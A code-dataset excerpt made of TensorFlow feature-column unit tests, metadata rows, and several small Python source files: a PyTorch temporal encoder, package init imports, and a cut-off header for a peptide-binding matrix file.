self.assertAllClose(output.eval(), [[14., 140., 1400., 14000., 140000.],
[1.4, 14., 140., 1400., 14000.]])
def testBucketizedColumn(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
sess.run(column_to_variable[bucket][0].assign([[0.1], [0.2], [0.3], [0.4
]]))
self.assertAllClose(output.eval(), [[0.3], [0.4], [0.1]])
def testBucketizedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 210], [110, 50], [-3, -30]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[3, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket, country],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
# dimension = 2, bucket_size = 4, num_classes = 1
sess.run(column_to_variable[bucket][0].assign(
[[0.1], [0.2], [0.3], [0.4], [1], [2], [3], [4]]))
self.assertAllClose(output.eval(), [[0.3 + 4], [0.4 + 3], [0.1 + 1]])
def testMulticlassWithBucketizedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 210], [110, 50], [-3, -30]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[3, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket, country],
num_outputs=5))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
# dimension = 2, bucket_size = 4, num_classes = 5
sess.run(column_to_variable[bucket][0].assign(
[[0.1, 1, 10, 100, 1000], [0.2, 2, 20, 200, 2000],
[0.3, 3, 30, 300, 3000], [0.4, 4, 40, 400, 4000],
[5, 50, 500, 5000, 50000], [6, 60, 600, 6000, 60000],
[7, 70, 700, 7000, 70000], [8, 80, 800, 8000, 80000]]))
self.assertAllClose(
output.eval(),
[[0.3 + 8, 3 + 80, 30 + 800, 300 + 8000, 3000 + 80000],
[0.4 + 7, 4 + 70, 40 + 700, 400 + 7000, 4000 + 70000],
[0.1 + 5, 1 + 50, 10 + 500, 100 + 5000, 1000 + 50000]])
def testCrossWithBucketizedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[country_price],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_price][0]
sess.run(weights.assign(weights + 0.4))
# There are two crosses each with 0.4 weight.
# score = 0.4 + 0.4
self.assertAllClose(output.eval(), [[0.8]])
def testCrossWithCrossedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
country_language_price = tf.contrib.layers.crossed_column(
set([country_language, price_bucket]),
hash_bucket_size=15)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language_price],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language_price][0]
sess.run(weights.assign(weights + 0.4))
# There are two crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testIntegerizedColumn(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.SparseTensor(values=[0, 4, 2],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.1], [0.5], [0.3]])
def testIntegerizedColumnWithDenseInputTensor(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.constant([[0], [4], [2]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.1], [0.5], [0.3]])
def testIntegerizedColumnWithDenseInputTensor2(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.constant([[0, 4], [2, 3]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.6], [0.7]])
def testIntegerizedColumnWithInvalidId(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.SparseTensor(values=[5, 4, 7],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.1], [0.5], [0.3]])
def testMulticlassWithOnlyBias(self):
with tf.Graph().as_default():
features = {"age": tf.constant([[10.], [20.], [30.], [40.]])}
output, _, bias = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [tf.contrib.layers.real_valued_column("age")],
num_outputs=3)
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
sess.run(bias.assign([0.1, 0.2, 0.3]))
self.assertAllClose(output.eval(), [[0.1, 0.2, 0.3], [0.1, 0.2, 0.3],
[0.1, 0.2, 0.3], [0.1, 0.2, 0.3]])
def testMulticlassWithRealValuedColumn(self):
with tf.Graph().as_default():
column = tf.contrib.layers.real_valued_column("age")
features = {"age": tf.constant([[10.], [20.], [30.], [40.]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (1, 3))
sess.run(weights.assign([[0.01, 0.03, 0.05]]))
self.assertAllClose(output.eval(), [[0.1, 0.3, 0.5], [0.2, 0.6, 1.0],
[0.3, 0.9, 1.5], [0.4, 1.2, 2.0]])
def testMulticlassWithSparseColumn(self):
with tf.Graph().as_default():
column = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "arabic", "hindi", "russian", "swahili"])
features = {
"language": tf.SparseTensor(
values=["hindi", "english", "arabic", "russian"],
indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
shape=[4, 1])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(output.eval(), [[0.3, 0.6, 0.9], [0.1, 0.4, 0.7],
[0.2, 0.5, 0.8], [0.4, 0.7, 1.0]])
def testMulticlassWithBucketizedColumn(self):
column = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 100., 500., 1000.])
with tf.Graph().as_default():
# buckets 0, 2, 1, 2
features = {"price": tf.constant([[-3], [110], [20.], [210]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(output.eval(), [[0.1, 0.4, 0.7], [0.3, 0.6, 0.9],
[0.2, 0.5, 0.8], [0.3, 0.6, 0.9]])
def testMulticlassWithCrossedColumn(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=2)
column = tf.contrib.layers.crossed_column(
{language, country}, hash_bucket_size=5)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(
values=["english", "spanish", "russian", "swahili"],
indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
shape=[4, 1]),
"country": tf.SparseTensor(values=["US", "SV", "RU", "KE"],
indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
shape=[4, 1])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(tf.shape(output).eval(), [4, 3])
def testMulticlassWithMultivalentColumn(self):
column = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "turkish", "hindi", "russian", "swahili"])
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(
values=["hindi", "english", "turkish", "turkish", "english"],
indices=[[0, 0], [0, 1], [1, 0], [2, 0], [3, 0]],
shape=[4, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(output.eval(), [[0.4, 1.0, 1.6], [0.2, 0.5, 0.8],
[0.2, 0.5, 0.8], [0.1, 0.4, 0.7]])
def testVariablesAddedToCollection(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_price, price_bucket],
num_outputs=1,
weight_collections=["my_collection"])
weights = tf.get_collection("my_collection")
# 3 = bias + price_bucket + country_price
self.assertEqual(3, len(weights))
class ParseExampleTest(tf.test.TestCase):
def testParseExample(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", dimension=3),
boundaries=[0., 10., 100.])
wire_cast = tf.contrib.layers.sparse_column_with_keys(
"wire_cast", ["marlo", "omar", "stringer"])
# buckets 2, 3, 0
data = tf.train.Example(features=tf.train.Features(feature={
"price": tf.train.Feature(float_list=tf.train.FloatList(value=[20., 110,
-3])),
"wire_cast": tf.train.Feature(bytes_list=tf.train.BytesList(value=[
b"stringer", b"marlo"
])),
}))
output = tf.contrib.layers.parse_feature_columns_from_examples(
serialized=[data.SerializeToString()],
feature_columns=[bucket, wire_cast])
self.assertIn(bucket, output)
self.assertIn(wire_cast, output)
with self.test_session():
tf.initialize_all_tables().run()
self.assertAllEqual(output[bucket].eval(), [[2, 3, 0]])
self.assertAllEqual(output[wire_cast].indices.eval(), [[0, 0], [0, 1]])
self.assertAllEqual(output[wire_cast].values.eval(), [2, 0])
def testParseSequenceExample(self):
location_keys = ["east_side", "west_side", "nyc"]
embedding_dimension = 10
location = tf.contrib.layers.sparse_column_with_keys(
"location", keys=location_keys)
location_onehot = tf.contrib.layers.one_hot_column(location)
wire_cast = tf.contrib.layers.sparse_column_with_keys(
"wire_cast", ["marlo", "omar", "stringer"])
wire_cast_embedded = tf.contrib.layers.embedding_column(
wire_cast, dimension=embedding_dimension)
measurements = tf.contrib.layers.real_valued_column(
"measurements", dimension=2)
context_feature_columns = [location_onehot]
sequence_feature_columns = [wire_cast_embedded, measurements]
sequence_example = tf.train.SequenceExample(
context=tf.train.Features(feature={
"location": tf.train.Feature(
bytes_list=tf.train.BytesList(
value=[b"west_side"])),
}),
feature_lists=tf.train.FeatureLists(feature_list={
"wire_cast": tf.train.FeatureList(feature=[
tf.train.Feature(bytes_list=tf.train.BytesList(
value=[b"marlo", b"stringer"])),
tf.train.Feature(bytes_list=tf.train.BytesList(
value=[b"omar", b"stringer", b"marlo"])),
tf.train.Feature(bytes_list=tf.train.BytesList(
value=[b"marlo"])),
]),
"measurements": tf.train.FeatureList(feature=[
tf.train.Feature(float_list=tf.train.FloatList(
value=[0.2, 0.3])),
tf.train.Feature(float_list=tf.train.FloatList(
value=[0.1, 0.8])),
tf.train.Feature(float_list=tf.train.FloatList(
value=[0.5, 0.0])),
])
}))
ctx, seq = tf.contrib.layers.parse_feature_columns_from_sequence_examples(
serialized=sequence_example.SerializeToString(),
context_feature_columns=context_feature_columns,
sequence_feature_columns=sequence_feature_columns)
self.assertIn("location", ctx)
self.assertIsInstance(ctx["location"], tf.SparseTensor)
self.assertIn("wire_cast", seq)
self.assertIsInstance(seq["wire_cast"], tf.SparseTensor)
self.assertIn("measurements", seq)
self.assertIsInstance(seq["measurements"], tf.Tensor)
with self.test_session() as sess:
location_val, wire_cast_val, measurement_val = sess.run([
ctx["location"], seq["wire_cast"], seq["measurements"]])
self.assertAllEqual(location_val.indices, np.array([[0]]))
self.assertAllEqual(location_val.values, np.array([b"west_side"]))
self.assertAllEqual(location_val.shape, np.array([1]))
self.assertAllEqual(wire_cast_val.indices, np.array(
[[0, 0], [0, 1], [1, 0], [1, 1], [1, 2], [2, 0]]))
self.assertAllEqual(wire_cast_val.values, np.array(
[b"marlo", b"stringer", b"omar", b"stringer", b"marlo", b"marlo"]))
self.assertAllEqual(wire_cast_val.shape, np.array([3, 3]))
self.assertAllClose(
measurement_val, np.array([[0.2, 0.3], [0.1, 0.8], [0.5, 0.0]]))
class InferRealValuedColumnTest(tf.test.TestCase):
def testTensorInt32(self):
self.assertEqual(
tf.contrib.layers.infer_real_valued_columns(
tf.zeros(shape=[33, 4], dtype=tf.int32)),
[tf.contrib.layers.real_valued_column("", dimension=4, dtype=tf.int32)])
def testTensorInt64(self):
self.assertEqual(
tf.contrib.layers.infer_real_valued_columns(
tf.zeros(shape=[33, 4], dtype=tf.int64)),
[tf.contrib.layers.real_valued_column("", dimension=4, dtype=tf.int64)])
def testTensorFloat32(self):
self.assertEqual(
tf.contrib.layers.infer_real_valued_columns(
tf.zeros(shape=[33, 4], dtype=tf.float32)),
[tf.contrib.layers.real_valued_column(
"", dimension=4, dtype=tf.float32)])
def testTensorFloat64(self):
self.assertEqual(
tf.contrib.layers.infer_real_valued_columns(
tf.zeros(shape=[33, 4], dtype=tf.float64)),
[tf.contrib.layers.real_valued_column(
"", dimension=4, dtype=tf.float64)])
def testDictionary(self):
self.assertItemsEqual(
tf.contrib.layers.infer_real_valued_columns({
"a": tf.zeros(shape=[33, 4], dtype=tf.int32),
"b": tf.zeros(shape=[3, 2], dtype=tf.float32)
}),
[tf.contrib.layers.real_valued_column(
"a", dimension=4, dtype=tf.int32),
tf.contrib.layers.real_valued_column(
"b", dimension=2, dtype=tf.float32)])
def testNotGoodDtype(self):
with self.assertRaises(ValueError):
tf.contrib.layers.infer_real_valued_columns(
tf.constant([["a"]], dtype=tf.string))
def testSparseTensor(self):
with self.assertRaises(ValueError):
tf.contrib.layers.infer_real_valued_columns(
tf.SparseTensor(indices=[[0, 0]], values=["a"], shape=[1, 1]))
if __name__ == "__main__":
tf.test.main()
| 46.084961 | 80 | 0.587866 | 11,603 | 101,433 | 4.930708 | 0.047143 | 0.074304 | 0.085473 | 0.006502 | 0.816923 | 0.796315 | 0.775952 | 0.746587 | 0.722361 | 0.699026 | 0 | 0.040519 | 0.272742 | 101,433 | 2,200 | 81 | 46.105909 | 0.735034 | 0.035629 | 0 | 0.67844 | 0 | 0 | 0.039481 | 0.001351 | 0 | 0 | 0 | 0 | 0.106484 | 1 | 0.054823 | false | 0.000527 | 0.00369 | 0 | 0.061676 | 0.001054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a66d48769a43218b358dbce21f65b7e5b385ce2 | 32 | py | Python | src/repositories/__init__.py | FernandoZnga/flask-api-setup | 220ad881e61432d017a1eb34fead461e2042309d | [
"MIT"
] | null | null | null | src/repositories/__init__.py | FernandoZnga/flask-api-setup | 220ad881e61432d017a1eb34fead461e2042309d | [
"MIT"
] | null | null | null | src/repositories/__init__.py | FernandoZnga/flask-api-setup | 220ad881e61432d017a1eb34fead461e2042309d | [
"MIT"
] | null | null | null | from .user import UserRepository | 32 | 32 | 0.875 | 4 | 32 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a67bd372ceb0dc6f7af9397f6624f490e11ec96 | 6,493 | py | Python | code/model/temporal_corr.py | JiwanChung/tapm | ec42b139d1c012daccc55f85e67744488d526476 | [
"MIT"
] | 14 | 2021-07-14T13:36:52.000Z | 2022-02-05T06:41:27.000Z | code/model/temporal_corr.py | JiwanChung/tapm | ec42b139d1c012daccc55f85e67744488d526476 | [
"MIT"
] | 11 | 2021-06-11T13:59:11.000Z | 2022-03-25T03:57:46.000Z | code/model/temporal_corr.py | JiwanChung/tapm | ec42b139d1c012daccc55f85e67744488d526476 | [
"MIT"
] | 4 | 2021-08-12T15:47:07.000Z | 2022-02-05T08:00:08.000Z | import torch
from torch import nn
from exp import ex
from .pretrain_aux import PretrainAuxGroupRoll
from .encoders import DeepEncoder
from .old_encoders import OldTemporalEncoderEx
class TemporalCorr(PretrainAuxGroupRoll):
# include prev, next
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
for feature in self.feature_names:
dim = self.feature_dims[feature]
setattr(self, feature,
nn.Sequential(*[TemporalEncoder(dim, self.gpt_dim)]))
def _get_frame_loss(self, c, frame):
# BGLC
c = c[:, :, 2:] # remove prev and next prediction
return super()._get_frame_loss(c, frame)
class TemporalCorrEx(TemporalCorr):
# include all five
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
for feature in self.feature_names:
dim = self.feature_dims[feature]
setattr(self, feature,
nn.Sequential(*[TemporalEncoderEx(dim, self.gpt_dim)]))
def _get_frame_loss(self, c, frame):
# BGLC
c = c[:, :, 4:] # remove prev and next prediction
return super()._get_frame_loss(c, frame)
class TemporalEncoder(nn.Module):
def __init__(self, in_dim, dim, Encoder=DeepEncoder):
super().__init__()
self.encoder = Encoder(in_dim, dim)
self.directions = {'prev': 1, 'next': -1}
self.empty = {'prev': 0, 'next': -1}
self.context_linear = nn.ModuleDict()
for direction in self.directions.keys():
self.context_linear[direction] = nn.Linear(dim, dim)
def forward(self, feature, h=None):
feature = self.encoder(feature)
# BGLC
# build inter-group correlation
f_prev = self.build_context(feature, 'prev')
f_next = self.build_context(feature, 'next')
feature = torch.cat((f_prev, f_next, feature), dim=-2)
return feature
def build_context(self, feature, direction='prev'):
feature = self.context_linear[direction](feature)
feature = feature.mean(dim=-2) # BGC
feature = feature.clone()
feature = feature.roll(self.directions[direction], 1)
feature[:, self.empty[direction]] = 0
return feature.unsqueeze(2)
class TemporalEncoderEx(nn.Module):
def __init__(self, in_dim, dim, Encoder=DeepEncoder):
super().__init__()
self.encoder = Encoder(in_dim, dim)
self.key_order = ['pprev', 'prev', 'next', 'nnext']
self.directions = {'prev': 1, 'next': -1, 'pprev': 2, 'nnext': -2}
self.empties = {'prev': [0], 'next': [-1], 'pprev': [0, 1], 'nnext': [-2, -1]}
self.context_linear = nn.ModuleDict()
for direction in self.directions.keys():
self.context_linear[direction] = nn.Linear(dim, dim)
def forward(self, feature, h=None):
feature = self.encoder(feature)
# BGLC
# build inter-group correlation
fs = []
for direction in self.key_order:
fs.append(self.build_context(feature, direction))
feature = torch.cat((*fs, feature), dim=-2)
return feature
def build_context(self, feature, direction='prev'):
feature = self.context_linear[direction](feature)
feature = feature.mean(dim=-2) # BGC
feature = feature.clone()
feature = feature.roll(self.directions[direction], 1)
for empty in self.empties[direction]:
size = empty + 1 if empty >= 0 else -empty
if feature.shape[1] >= size:
feature[:, empty] = 0
return feature.unsqueeze(2)
class TemporalCorrGlobal(TemporalCorrEx):
# include all five
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
for feature in self.feature_names:
dim = self.feature_dims[feature]
setattr(self, feature,
nn.Sequential(*[TemporalEncoderGlobal(dim, self.gpt_dim)]))
def _get_frame_loss(self, c, frame):
# BGLC
c = c[:, :, 5:] # remove global, prev and next prediction
return super()._get_frame_loss(c, frame)
class TemporalEncoderGlobal(TemporalEncoderEx):
# class TemporalEncoderGlobal(OldTemporalEncoderEx):
def __init__(self, in_dim, dim, Encoder=DeepEncoder):
super().__init__(in_dim, dim, Encoder)
self.context_linear['global'] = nn.Linear(dim, dim)
def forward(self, feature, h=None):
feature = self.encoder(feature)
# BGLC
# build inter-group correlation
fs = [self.build_context_global(feature)]
for direction in self.key_order:
fs.append(self.build_context(feature, direction))
feature = torch.cat((*fs, feature), dim=-2)
return feature
def global_pool(self, f):
f = self.context_linear['global'](f)
return f.mean(dim=-2)
def build_context_global(self, feature):
B, G, _, C = feature.shape
feature = self.global_pool(feature) # BGC
feature = feature.mean(dim=-2) # BC
feature = feature.contiguous().view(B, 1, 1, C)
feature = feature.repeat(1, G, 1, 1)
return feature
class TemporalEncoderGlobalAR(TemporalEncoderEx):
def __init__(self, in_dim, dim, Encoder=DeepEncoder):
super().__init__(in_dim, dim, Encoder)
self.context_linear['global'] = nn.Linear(dim, dim)
def forward(self, feature, h=None):
feature = super().forward(feature)
# BGLC
# build inter-group correlation
fs = [self.build_context_global(feature)]
for direction in self.key_order:
fs.append(self.build_context(feature, direction))
feature = torch.cat((*fs, feature), dim=-2)
return feature
def global_pool(self, f):
f = self.context_linear['global'](f)
return f.mean(dim=-2)
def build_context_global(self, feature):
B, G, L, C = feature.shape
feature = self.global_pool(feature) # BGC
feature = feature.mean(dim=-2) # BC
feature = feature.contiguous().view(B, 1, 1, C)
feature = feature.repeat(1, G, 1, 1)
return feature
| 33.817708 | 86 | 0.625905 | 781 | 6,493 | 5.012804 | 0.131882 | 0.047765 | 0.043423 | 0.050575 | 0.796169 | 0.796169 | 0.770115 | 0.770115 | 0.770115 | 0.770115 | 0 | 0.00949 | 0.253504 | 6,493 | 191 | 87 | 33.994764 | 0.798226 | 0.059141 | 0 | 0.723077 | 0 | 0 | 0.01808 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.046154 | 0 | 0.353846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a760b5ce62d993f6914fb105a697b8e98c5b4a3 | 133 | py | Python | sails/ui/mmck/parameters/__init__.py | metrasynth/solar-sails | 3a10774dad29d85834d3acb38171741b3a11ef91 | [
"MIT"
] | 6 | 2016-11-22T14:32:55.000Z | 2021-08-15T01:35:33.000Z | sails/ui/mmck/parameters/__init__.py | metrasynth/s4ils | efc061993d15ebe662b72ab8b3127f7f7ce2f66b | [
"MIT"
] | 2 | 2022-03-18T16:47:43.000Z | 2022-03-18T16:47:44.000Z | sails/ui/mmck/parameters/__init__.py | metrasynth/s4ils | efc061993d15ebe662b72ab8b3127f7f7ce2f66b | [
"MIT"
] | 2 | 2019-07-09T23:44:08.000Z | 2021-08-15T01:35:37.000Z | # Register widgets for parameter types
from . import integer
from . import keyvaluepairs
from . import pathlist
from . import string
| 22.166667 | 38 | 0.796992 | 17 | 133 | 6.235294 | 0.647059 | 0.377358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165414 | 133 | 5 | 39 | 26.6 | 0.954955 | 0.270677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8ac2265f2e335381d1f5fc42e925c4b1e6f0a2ee | 2,167 | py | Python | epytope/Data/pssms/tepitopepan/mat/DRB1_1601_9.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 7 | 2021-02-01T18:11:28.000Z | 2022-01-31T19:14:07.000Z | epytope/Data/pssms/tepitopepan/mat/DRB1_1601_9.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 22 | 2021-01-02T15:25:23.000Z | 2022-03-14T11:32:53.000Z | epytope/Data/pssms/tepitopepan/mat/DRB1_1601_9.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
